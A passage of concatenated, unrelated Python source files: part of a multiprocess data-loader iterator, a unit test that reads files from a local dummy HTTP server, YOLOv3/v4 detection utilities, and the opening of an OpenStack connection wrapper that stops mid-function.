self._task_infos[self._send_idx] = (worker_idx, )
self._batches_outstanding += 1
self._send_idx += 1
def __del__(self):
self._try_shutdown_all()
def _shutdown_on_exit(self):
self._try_shutdown_all(1)
def __next__(self):
trace_event = profiler.RecordEvent(
name="_DataLoaderIterMultiProcess",
event_type=profiler.TracerEventType.Dataloader)
trace_event.begin()
try:
benchmark().check_if_need_record(self)
benchmark().before_reader()
# _batches_outstanding here record the total batch data number
# in 'from after _try_put_indices to beforeoutput data', this
# value should be _outstanding_capacity if data is not drained,
# if _batches_outstanding is less than _places number, there are
# no enough data to generate next output, close blocking_queue and
# set _thread_done_event here, py_reader will raise StopIteration,
# end workers and indices_queues in StopIteration handling
if self._batches_outstanding < len(self._places):
if self._persistent_workers:
raise StopIteration
else:
self._thread_done_event.set()
self._blocking_queue.close()
if in_dygraph_mode():
data = core.eager.read_next_tensor_list(
self._reader.read_next_list()[0])
data = _restore_batch(data, self._structure_infos.pop(0))
else:
if _in_legacy_dygraph():
data = self._reader.read_next_var_list()
data = _restore_batch(data, self._structure_infos.pop(0))
else:
if self._return_list:
data = self._reader.read_next_list()
for i in range(len(data)):
data[i] = data[i]._move_to_list()
data = [
_restore_batch(d, s)
for d, s in zip(data, self._structure_infos[:len(
self._places)])
]
self._structure_infos = self._structure_infos[len(
self._places):]
# static graph organized data on multi-device with list, if
# place number is 1, there is only 1 device, extra the data
# from list for devices to be compatible with dygraph mode
if len(self._places) == 1:
data = data[0]
else:
data = self._reader.read_next()
self._on_output_batch()
benchmark().after_reader()
return data
except StopIteration:
if not self._persistent_workers:
self._reader.shutdown()
self._try_shutdown_all()
six.reraise(*sys.exc_info())
finally:
trace_event.end()
# python2 compatibility
def next(self):
return self.__next__()
def _on_output_batch(self):
for _ in range(len(self._places)):
self._batches_outstanding -= 1
self._try_put_indices()
|
test_url.py
|
import gzip
import http.server
import threading
import unittest
import wfdb.io._url
class TestNetFiles(unittest.TestCase):
"""
Test accessing remote files.
"""
def test_requests(self):
"""
Test reading a remote file using various APIs.
This tests that we can create a file object using
wfdb.io._url.openurl(), and tests that the object implements
the standard Python API functions for a file of the
appropriate type.
Parameters
----------
N/A
Returns
-------
N/A
"""
text_data = """
BERNARDO: Who's there?
FRANCISCO: Nay, answer me: stand, and unfold yourself.
BERNARDO: Long live the king!
FRANCISCO: Bernardo?
BERNARDO: He.
FRANCISCO: You come most carefully upon your hour.
BERNARDO: 'Tis now struck twelve; get thee to bed, Francisco.
"""
binary_data = text_data.encode()
file_content = {'/foo.txt': binary_data}
# Test all possible combinations of:
# - whether or not the server supports compression
# - whether or not the server supports random access
# - chosen buffering policy
for allow_gzip in (False, True):
for allow_range in (False, True):
with DummyHTTPServer(file_content=file_content,
allow_gzip=allow_gzip,
allow_range=allow_range) as server:
url = server.url('/foo.txt')
for buffering in (-2, -1, 0, 20):
self._test_text(url, text_data, buffering)
self._test_binary(url, binary_data, buffering)
def _test_text(self, url, content, buffering):
"""
Test reading a URL using text-mode file APIs.
Parameters
----------
url : str
URL of the remote resource.
content : str
Expected content of the resource.
buffering : int
Buffering policy for openurl().
Returns
-------
N/A
"""
# read(-1), readable(), seekable()
with wfdb.io._url.openurl(url, 'r', buffering=buffering) as tf:
self.assertTrue(tf.readable())
self.assertTrue(tf.seekable())
self.assertEqual(tf.read(), content)
self.assertEqual(tf.read(), '')
# read(10)
with wfdb.io._url.openurl(url, 'r', buffering=buffering) as tf:
result = ''
while True:
chunk = tf.read(10)
result += chunk
if len(chunk) < 10:
break
self.assertEqual(result, content)
# readline(), seek(), tell()
with wfdb.io._url.openurl(url, 'r', buffering=buffering) as tf:
result = ''
while True:
rpos = tf.tell()
tf.seek(0)
tf.seek(rpos)
chunk = tf.readline()
result += chunk
if len(chunk) == 0:
break
self.assertEqual(result, content)
def _test_binary(self, url, content, buffering):
"""
Test reading a URL using binary-mode file APIs.
Parameters
----------
url : str
URL of the remote resource.
content : bytes
Expected content of the resource.
buffering : int
Buffering policy for openurl().
Returns
-------
N/A
"""
# read(-1), readable(), seekable()
with wfdb.io._url.openurl(url, 'rb', buffering=buffering) as bf:
self.assertTrue(bf.readable())
self.assertTrue(bf.seekable())
self.assertEqual(bf.read(), content)
self.assertEqual(bf.read(), b'')
self.assertEqual(bf.tell(), len(content))
# read(10)
with wfdb.io._url.openurl(url, 'rb', buffering=buffering) as bf:
result = b''
while True:
chunk = bf.read(10)
result += chunk
if len(chunk) < 10:
break
self.assertEqual(result, content)
self.assertEqual(bf.tell(), len(content))
# readline()
with wfdb.io._url.openurl(url, 'rb', buffering=buffering) as bf:
result = b''
while True:
chunk = bf.readline()
result += chunk
if len(chunk) == 0:
break
self.assertEqual(result, content)
self.assertEqual(bf.tell(), len(content))
# read1(10), seek(), tell()
with wfdb.io._url.openurl(url, 'rb', buffering=buffering) as bf:
bf.seek(0, 2)
self.assertEqual(bf.tell(), len(content))
bf.seek(0)
result = b''
while True:
rpos = bf.tell()
bf.seek(0)
bf.seek(rpos)
chunk = bf.read1(10)
result += chunk
if len(chunk) == 0:
break
self.assertEqual(result, content)
self.assertEqual(bf.tell(), len(content))
# readinto(bytearray(10))
with wfdb.io._url.openurl(url, 'rb', buffering=buffering) as bf:
result = b''
chunk = bytearray(10)
while True:
count = bf.readinto(chunk)
result += chunk[:count]
if count < 10:
break
self.assertEqual(result, content)
self.assertEqual(bf.tell(), len(content))
# readinto1(bytearray(10))
with wfdb.io._url.openurl(url, 'rb', buffering=buffering) as bf:
result = b''
chunk = bytearray(10)
while True:
count = bf.readinto1(chunk)
result += chunk[:count]
if count == 0:
break
self.assertEqual(result, content)
self.assertEqual(bf.tell(), len(content))
class DummyHTTPServer(http.server.HTTPServer):
"""
HTTPServer used to simulate a web server for testing.
The server may be used as a context manager (using "with"); during
execution of the "with" block, a background thread runs that
listens for and handles client requests.
Attributes
----------
file_content : dict
Dictionary containing the content of each file on the server.
The keys are absolute paths (such as "/foo.txt"); the values
are the corresponding content (bytes).
allow_gzip : bool, optional
True if the server should return compressed responses (using
"Content-Encoding: gzip") when the client requests them (using
"Accept-Encoding: gzip").
allow_range : bool, optional
True if the server should return partial responses (using 206
Partial Content and "Content-Range") when the client requests
them (using "Range").
server_address : tuple (str, int), optional
A tuple specifying the address and port number where the
server should listen for connections. If the port is 0, an
arbitrary unused port is selected. The default address is
"127.0.0.1" and the default port is 0.
"""
def __init__(self, file_content, allow_gzip=True, allow_range=True,
server_address=('127.0.0.1', 0)):
super().__init__(server_address, DummyHTTPRequestHandler)
self.file_content = file_content
self.allow_gzip = allow_gzip
self.allow_range = allow_range
def url(self, path='/'):
"""
Generate a URL that points to a file on this server.
Parameters
----------
path : str, optional
Path of the file on the server.
Returns
-------
url : str
Absolute URL for the specified file.
"""
return 'http://127.0.0.1:%d/%s' % (self.server_address[1],
path.lstrip('/'))
def __enter__(self):
super().__enter__()
self.thread = threading.Thread(target=self.serve_forever)
self.thread.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.shutdown()
self.thread.join()
self.thread = None
return super().__exit__(exc_type, exc_val, exc_tb)
class DummyHTTPRequestHandler(http.server.BaseHTTPRequestHandler):
"""
HTTPRequestHandler used to simulate a web server for testing.
"""
def do_HEAD(self):
self.send_head()
def do_GET(self):
body = self.send_head()
self.wfile.write(body)
def log_message(self, message, *args):
pass
def send_head(self):
content = self.server.file_content.get(self.path)
if content is None:
self.send_error(404)
return b''
headers = {'Content-Type': 'text/plain'}
status = 200
if self.server.allow_gzip:
headers['Vary'] = 'Accept-Encoding'
if 'gzip' in self.headers.get('Accept-Encoding', ''):
content = gzip.compress(content)
headers['Content-Encoding'] = 'gzip'
if self.server.allow_range:
headers['Accept-Ranges'] = 'bytes'
req_range = self.headers.get('Range', '')
if req_range.startswith('bytes='):
start, end = req_range.split('=')[1].split('-')
start = int(start)
if end == '':
end = len(content)
else:
end = min(len(content), int(end) + 1)
if start < end:
status = 206
resp_range = 'bytes %d-%d/%d' % (
start, end - 1, len(content))
content = content[start:end]
else:
status = 416
resp_range = 'bytes */%d' % len(content)
content = b''
headers['Content-Range'] = resp_range
headers['Content-Length'] = len(content)
self.send_response(status)
for h, v in sorted(headers.items()):
self.send_header(h, v)
self.end_headers()
return content
if __name__ == "__main__":
unittest.main()
|
utils.py
|
#================================================================
#
# File name : utils.py
# Author : PyLessons
# Created date: 2020-09-27
# Website : https://pylessons.com/
# GitHub : https://github.com/pythonlessons/TensorFlow-2.x-YOLOv3
# Description : additional yolov3 and yolov4 functions
#
#================================================================
from multiprocessing import Process, Queue, Pipe
import cv2
import time
import random
import colorsys
import numpy as np
import tensorflow as tf
from yolov3.configs import *
from yolov3.yolov4 import *
from tensorflow.python.saved_model import tag_constants
def load_yolo_weights(model, weights_file):
tf.keras.backend.clear_session() # used to reset layer names
# load Darknet original weights to TensorFlow model
if YOLO_TYPE == "yolov3":
range1 = 75 if not TRAIN_YOLO_TINY else 13
range2 = [58, 66, 74] if not TRAIN_YOLO_TINY else [9, 12]
if YOLO_TYPE == "yolov4":
range1 = 110 if not TRAIN_YOLO_TINY else 21
range2 = [93, 101, 109] if not TRAIN_YOLO_TINY else [17, 20]
with open(weights_file, 'rb') as wf:
major, minor, revision, seen, _ = np.fromfile(wf, dtype=np.int32, count=5)
j = 0
for i in range(range1):
if i > 0:
conv_layer_name = 'conv2d_%d' %i
else:
conv_layer_name = 'conv2d'
if j > 0:
bn_layer_name = 'batch_normalization_%d' %j
else:
bn_layer_name = 'batch_normalization'
conv_layer = model.get_layer(conv_layer_name)
filters = conv_layer.filters
k_size = conv_layer.kernel_size[0]
in_dim = conv_layer.input_shape[-1]
if i not in range2:
# darknet weights: [beta, gamma, mean, variance]
bn_weights = np.fromfile(wf, dtype=np.float32, count=4 * filters)
# tf weights: [gamma, beta, mean, variance]
bn_weights = bn_weights.reshape((4, filters))[[1, 0, 2, 3]]
bn_layer = model.get_layer(bn_layer_name)
j += 1
else:
conv_bias = np.fromfile(wf, dtype=np.float32, count=filters)
# darknet shape (out_dim, in_dim, height, width)
conv_shape = (filters, in_dim, k_size, k_size)
conv_weights = np.fromfile(wf, dtype=np.float32, count=np.product(conv_shape))
# tf shape (height, width, in_dim, out_dim)
conv_weights = conv_weights.reshape(conv_shape).transpose([2, 3, 1, 0])
if i not in range2:
conv_layer.set_weights([conv_weights])
bn_layer.set_weights(bn_weights)
else:
conv_layer.set_weights([conv_weights, conv_bias])
assert len(wf.read()) == 0, 'failed to read all data'
def Load_Yolo_model():
gpus = tf.config.experimental.list_physical_devices('GPU')
if len(gpus) > 0:
print(f'GPUs {gpus}')
try: tf.config.experimental.set_memory_growth(gpus[0], True)
except RuntimeError: pass
if YOLO_FRAMEWORK == "tf": # TensorFlow detection
if YOLO_TYPE == "yolov4":
Darknet_weights = YOLO_V4_TINY_WEIGHTS if TRAIN_YOLO_TINY else YOLO_V4_WEIGHTS
if YOLO_TYPE == "yolov3":
Darknet_weights = YOLO_V3_TINY_WEIGHTS if TRAIN_YOLO_TINY else YOLO_V3_WEIGHTS
if YOLO_CUSTOM_WEIGHTS == False:
print("Loading Darknet_weights from:", Darknet_weights)
yolo = Create_Yolo(input_size=YOLO_INPUT_SIZE, CLASSES=YOLO_COCO_CLASSES)
load_yolo_weights(yolo, Darknet_weights) # use Darknet weights
else:
print("Loading custom weights from:", YOLO_CUSTOM_WEIGHTS)
yolo = Create_Yolo(input_size=YOLO_INPUT_SIZE, CLASSES=TRAIN_CLASSES)
checkpoint = f"./checkpoints/{TRAIN_MODEL_NAME}"
if TRAIN_YOLO_TINY:
checkpoint += "_Tiny"
yolo.load_weights(checkpoint) # use custom weights
elif YOLO_FRAMEWORK == "trt": # TensorRT detection
saved_model_loaded = tf.saved_model.load(YOLO_CUSTOM_WEIGHTS, tags=[tag_constants.SERVING])
signature_keys = list(saved_model_loaded.signatures.keys())
yolo = saved_model_loaded.signatures['serving_default']
return yolo
def image_preprocess(image, target_size, gt_boxes=None):
ih, iw = target_size
h, w, _ = image.shape
scale = min(iw/w, ih/h)
nw, nh = int(scale * w), int(scale * h)
image_resized = cv2.resize(image, (nw, nh))
image_paded = np.full(shape=[ih, iw, 3], fill_value=128.0)
dw, dh = (iw - nw) // 2, (ih-nh) // 2
image_paded[dh:nh+dh, dw:nw+dw, :] = image_resized
image_paded = image_paded / 255.
if gt_boxes is None:
return image_paded
else:
gt_boxes[:, [0, 2]] = gt_boxes[:, [0, 2]] * scale + dw
gt_boxes[:, [1, 3]] = gt_boxes[:, [1, 3]] * scale + dh
return image_paded, gt_boxes
def draw_bbox(image, bboxes, CLASSES=YOLO_COCO_CLASSES, show_label=True, show_confidence = True, Text_colors=(255,255,0), rectangle_colors='', tracking=False):
NUM_CLASS = read_class_names(CLASSES)
num_classes = len(NUM_CLASS)
image_h, image_w, _ = image.shape
hsv_tuples = [(1.0 * x / num_classes, 1., 1.) for x in range(num_classes)]
#print("hsv_tuples", hsv_tuples)
colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
colors = list(map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)), colors))
random.seed(0)
random.shuffle(colors)
random.seed(None)
for i, bbox in enumerate(bboxes):
coor = np.array(bbox[:4], dtype=np.int32)
score = bbox[4]
class_ind = int(bbox[5])
bbox_color = rectangle_colors if rectangle_colors != '' else colors[class_ind]
bbox_thick = int(0.6 * (image_h + image_w) / 1000)
if bbox_thick < 1: bbox_thick = 1
fontScale = 0.75 * bbox_thick
(x1, y1), (x2, y2) = (coor[0], coor[1]), (coor[2], coor[3])
# put object rectangle
cv2.rectangle(image, (x1, y1), (x2, y2), bbox_color, bbox_thick*2)
if show_label:
# get text label
score_str = " {:.2f}".format(score) if show_confidence else ""
if tracking: score_str = " "+str(score)
try:
label = "{}".format(NUM_CLASS[class_ind]) + score_str
except KeyError:
print("You received KeyError, this might be that you are trying to use yolo original weights")
print("while using custom classes, if using custom model in configs.py set YOLO_CUSTOM_WEIGHTS = True")
# get text size
(text_width, text_height), baseline = cv2.getTextSize(label, cv2.FONT_HERSHEY_COMPLEX_SMALL,
fontScale, thickness=bbox_thick)
# put filled text rectangle
cv2.rectangle(image, (x1, y1), (x1 + text_width, y1 - text_height - baseline), bbox_color, thickness=cv2.FILLED)
# put text above rectangle
cv2.putText(image, label, (x1, y1-4), cv2.FONT_HERSHEY_COMPLEX_SMALL,
fontScale, Text_colors, bbox_thick, lineType=cv2.LINE_AA)
return image
def bboxes_iou(boxes1, boxes2):
boxes1 = np.array(boxes1)
boxes2 = np.array(boxes2)
boxes1_area = (boxes1[..., 2] - boxes1[..., 0]) * (boxes1[..., 3] - boxes1[..., 1])
boxes2_area = (boxes2[..., 2] - boxes2[..., 0]) * (boxes2[..., 3] - boxes2[..., 1])
left_up = np.maximum(boxes1[..., :2], boxes2[..., :2])
right_down = np.minimum(boxes1[..., 2:], boxes2[..., 2:])
inter_section = np.maximum(right_down - left_up, 0.0)
inter_area = inter_section[..., 0] * inter_section[..., 1]
union_area = boxes1_area + boxes2_area - inter_area
ious = np.maximum(1.0 * inter_area / union_area, np.finfo(np.float32).eps)
return ious
def nms(bboxes, iou_threshold, sigma=0.3, method='nms'):
"""
:param bboxes: (xmin, ymin, xmax, ymax, score, class)
Note: soft-nms, https://arxiv.org/pdf/1704.04503.pdf
https://github.com/bharatsingh430/soft-nms
"""
classes_in_img = list(set(bboxes[:, 5]))
best_bboxes = []
for cls in classes_in_img:
cls_mask = (bboxes[:, 5] == cls)
cls_bboxes = bboxes[cls_mask]
# Process 1: Determine whether the number of bounding boxes is greater than 0
while len(cls_bboxes) > 0:
# Process 2: Select the bounding box with the highest score according to socre order A
max_ind = np.argmax(cls_bboxes[:, 4])
best_bbox = cls_bboxes[max_ind]
best_bboxes.append(best_bbox)
cls_bboxes = np.concatenate([cls_bboxes[: max_ind], cls_bboxes[max_ind + 1:]])
# Process 3: Calculate this bounding box A and
# Remain all iou of the bounding box and remove those bounding boxes whose iou value is higher than the threshold
iou = bboxes_iou(best_bbox[np.newaxis, :4], cls_bboxes[:, :4])
weight = np.ones((len(iou),), dtype=np.float32)
assert method in ['nms', 'soft-nms']
if method == 'nms':
iou_mask = iou > iou_threshold
weight[iou_mask] = 0.0
if method == 'soft-nms':
weight = np.exp(-(1.0 * iou ** 2 / sigma))
cls_bboxes[:, 4] = cls_bboxes[:, 4] * weight
score_mask = cls_bboxes[:, 4] > 0.
cls_bboxes = cls_bboxes[score_mask]
return best_bboxes
def postprocess_boxes(pred_bbox, original_image, input_size, score_threshold):
valid_scale=[0, np.inf]
pred_bbox = np.array(pred_bbox)
pred_xywh = pred_bbox[:, 0:4]
pred_conf = pred_bbox[:, 4]
pred_prob = pred_bbox[:, 5:]
# 1. (x, y, w, h) --> (xmin, ymin, xmax, ymax)
pred_coor = np.concatenate([pred_xywh[:, :2] - pred_xywh[:, 2:] * 0.5,
pred_xywh[:, :2] + pred_xywh[:, 2:] * 0.5], axis=-1)
# 2. (xmin, ymin, xmax, ymax) -> (xmin_org, ymin_org, xmax_org, ymax_org)
org_h, org_w = original_image.shape[:2]
resize_ratio = min(input_size / org_w, input_size / org_h)
dw = (input_size - resize_ratio * org_w) / 2
dh = (input_size - resize_ratio * org_h) / 2
pred_coor[:, 0::2] = 1.0 * (pred_coor[:, 0::2] - dw) / resize_ratio
pred_coor[:, 1::2] = 1.0 * (pred_coor[:, 1::2] - dh) / resize_ratio
# 3. clip some boxes those are out of range
pred_coor = np.concatenate([np.maximum(pred_coor[:, :2], [0, 0]),
np.minimum(pred_coor[:, 2:], [org_w - 1, org_h - 1])], axis=-1)
invalid_mask = np.logical_or((pred_coor[:, 0] > pred_coor[:, 2]), (pred_coor[:, 1] > pred_coor[:, 3]))
pred_coor[invalid_mask] = 0
# 4. discard some invalid boxes
bboxes_scale = np.sqrt(np.multiply.reduce(pred_coor[:, 2:4] - pred_coor[:, 0:2], axis=-1))
scale_mask = np.logical_and((valid_scale[0] < bboxes_scale), (bboxes_scale < valid_scale[1]))
# 5. discard boxes with low scores
classes = np.argmax(pred_prob, axis=-1)
scores = pred_conf * pred_prob[np.arange(len(pred_coor)), classes]
score_mask = scores > score_threshold
mask = np.logical_and(scale_mask, score_mask)
coors, scores, classes = pred_coor[mask], scores[mask], classes[mask]
return np.concatenate([coors, scores[:, np.newaxis], classes[:, np.newaxis]], axis=-1)
def detect_image(Yolo, image_path, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors=''):
original_image = cv2.imread(image_path)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
image_data = image_preprocess(np.copy(original_image), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
image = draw_bbox(original_image, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
# CreateXMLfile("XML_Detections", str(int(time.time())), original_image, bboxes, read_class_names(CLASSES))
if output_path != '': cv2.imwrite(output_path, image)
if show:
# Show the image
cv2.imshow("predicted image", image)
# Load and hold the image
cv2.waitKey(0)
# To close the window after the required kill value was provided
cv2.destroyAllWindows()
return image
def Predict_bbox_mp(Frames_data, Predicted_data, Processing_times):
gpus = tf.config.experimental.list_physical_devices('GPU')
if len(gpus) > 0:
try: tf.config.experimental.set_memory_growth(gpus[0], True)
except RuntimeError: print("RuntimeError in tf.config.experimental.list_physical_devices('GPU')")
Yolo = Load_Yolo_model()
times = []
while True:
if Frames_data.qsize()>0:
image_data = Frames_data.get()
t1 = time.time()
Processing_times.put(time.time())
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
Predicted_data.put(pred_bbox)
def postprocess_mp(Predicted_data, original_frames, Processed_frames, Processing_times, input_size, CLASSES, score_threshold, iou_threshold, rectangle_colors, realtime):
times = []
while True:
if Predicted_data.qsize()>0:
pred_bbox = Predicted_data.get()
if realtime:
while original_frames.qsize() > 1:
original_image = original_frames.get()
else:
original_image = original_frames.get()
bboxes = postprocess_boxes(pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
image = draw_bbox(original_image, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
times.append(time.time()-Processing_times.get())
times = times[-20:]
ms = sum(times)/len(times)*1000
fps = 1000 / ms
image = cv2.putText(image, "Time: {:.1f}FPS".format(fps), (0, 30), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
#print("Time: {:.2f}ms, Final FPS: {:.1f}".format(ms, fps))
Processed_frames.put(image)
def Show_Image_mp(Processed_frames, show, Final_frames):
while True:
if Processed_frames.qsize()>0:
image = Processed_frames.get()
Final_frames.put(image)
if show:
cv2.imshow('output', image)
if cv2.waitKey(25) & 0xFF == ord("q"):
cv2.destroyAllWindows()
break
# detect from webcam
def detect_video_realtime_mp(video_path, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors='', realtime=False):
if realtime:
vid = cv2.VideoCapture(0)
else:
vid = cv2.VideoCapture(video_path)
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(output_path, codec, fps, (width, height)) # output_path must be .mp4
no_of_frames = int(vid.get(cv2.CAP_PROP_FRAME_COUNT))
original_frames = Queue()
Frames_data = Queue()
Predicted_data = Queue()
Processed_frames = Queue()
Processing_times = Queue()
Final_frames = Queue()
p1 = Process(target=Predict_bbox_mp, args=(Frames_data, Predicted_data, Processing_times))
p2 = Process(target=postprocess_mp, args=(Predicted_data, original_frames, Processed_frames, Processing_times, input_size, CLASSES, score_threshold, iou_threshold, rectangle_colors, realtime))
p3 = Process(target=Show_Image_mp, args=(Processed_frames, show, Final_frames))
p1.start()
p2.start()
p3.start()
while True:
ret, img = vid.read()
if not ret:
break
original_image = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
original_frames.put(original_image)
image_data = image_preprocess(np.copy(original_image), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
Frames_data.put(image_data)
while True:
if original_frames.qsize() == 0 and Frames_data.qsize() == 0 and Predicted_data.qsize() == 0 and Processed_frames.qsize() == 0 and Processing_times.qsize() == 0 and Final_frames.qsize() == 0:
p1.terminate()
p2.terminate()
p3.terminate()
break
elif Final_frames.qsize()>0:
image = Final_frames.get()
if output_path != '': out.write(image)
cv2.destroyAllWindows()
def detect_video(Yolo, video_path, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors=''):
times, times_2 = [], []
vid = cv2.VideoCapture(video_path)
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(output_path, codec, fps, (width, height)) # output_path must be .mp4
while True:
_, img = vid.read()
try:
original_image = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
except:
break
image_data = image_preprocess(np.copy(original_image), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
t1 = time.time()
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
t2 = time.time()
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
image = draw_bbox(original_image, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
t3 = time.time()
times.append(t2-t1)
times_2.append(t3-t1)
times = times[-20:]
times_2 = times_2[-20:]
ms = sum(times)/len(times)*1000
fps = 1000 / ms
fps2 = 1000 / (sum(times_2)/len(times_2)*1000)
image = cv2.putText(image, "Time: {:.1f}FPS".format(fps), (0, 30), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
# CreateXMLfile("XML_Detections", str(int(time.time())), original_image, bboxes, read_class_names(CLASSES))
print("Time: {:.2f}ms, Detection FPS: {:.1f}, total FPS: {:.1f}".format(ms, fps, fps2))
if output_path != '': out.write(image)
if show:
cv2.imshow('output', image)
if cv2.waitKey(25) & 0xFF == ord("q"):
cv2.destroyAllWindows()
break
cv2.destroyAllWindows()
# detect from webcam
def detect_realtime(Yolo, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors=''):
times = []
vid = cv2.VideoCapture(0)
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(output_path, codec, fps, (width, height)) # output_path must be .mp4
while True:
_, frame = vid.read()
try:
original_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
original_frame = cv2.cvtColor(original_frame, cv2.COLOR_BGR2RGB)
except:
break
image_data = image_preprocess(np.copy(original_frame), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
t1 = time.time()
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
t2 = time.time()
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(pred_bbox, original_frame, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
times.append(t2-t1)
times = times[-20:]
ms = sum(times)/len(times)*1000
fps = 1000 / ms
print("Time: {:.2f}ms, {:.1f} FPS".format(ms, fps))
frame = draw_bbox(original_frame, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
# CreateXMLfile("XML_Detections", str(int(time.time())), original_frame, bboxes, read_class_names(CLASSES))
image = cv2.putText(frame, "Time: {:.1f}FPS".format(fps), (0, 30),
cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
if output_path != '': out.write(frame)
if show:
cv2.imshow('output', frame)
if cv2.waitKey(25) & 0xFF == ord("q"):
cv2.destroyAllWindows()
break
cv2.destroyAllWindows()
|
utils.py
|
import openstack
import functools
from multiprocessing import Process
# openstack.enable_logging(debug=True)
import logging
# Logging Parameters
logger = logging.getLogger(__name__)
file_handler = logging.handlers.RotatingFileHandler(
'katana.log', maxBytes=10000, backupCount=5)
stream_handler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s %(name)s %(levelname)s %(message)s')
stream_formatter = logging.Formatter(
'%(asctime)s %(name)s %(levelname)s %(message)s')
file_handler.setFormatter(formatter)
stream_handler.setFormatter(stream_formatter)
logger.setLevel(logging.DEBUG)
logger.addHandler(file_handler)
logger.addHandler(stream_handler)
def timeout(func):
"""
Wrapper for function, terminate after 5 seconds
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
action = Process(target=func, args=args, kwargs=kwargs)
action.start()
action.join(timeout=5)
if action.is_alive():
# terminate function
action.terminate()
# clean up
action.join()
raise (TimeoutError)
# if process is not 0, is not succesfull
if action.exitcode != 0:
# raise Attirbute Error, which is the most probable
raise (AttributeError)
return (wrapper)
class Openstack():
"""
Class implementing the communication API with OpenStack
"""
# Note: Cannot use conn as a self variable, as it is not possible to
# serialize it and store it in a db
def __init__(self, uuid, auth_url, project_name, username, password,
user_domain_name='Default',
project_domain_name='default'):
"""
Initialize an object of the class
"""
self.uuid = uuid
self.auth_url = auth_url
self.project_name = project_name
self.username = username
self.password = password
self.user_domain_name = user_domain_name
self.project_domain_name = project_domain_name
conn = openstack.connect(
auth_url=self.auth_url,
project_name=self.project_name,
username=self.username,
password=self.password,
user_domain_name=self.user_domain_name,
project_domain_name=self.project_domain_name,
)
try:
conn.authorize()
except AttributeError as e:
logger.exception("AttributeError baby")
self.auth_error = True
except Exception as e:
# raise for logging purposes
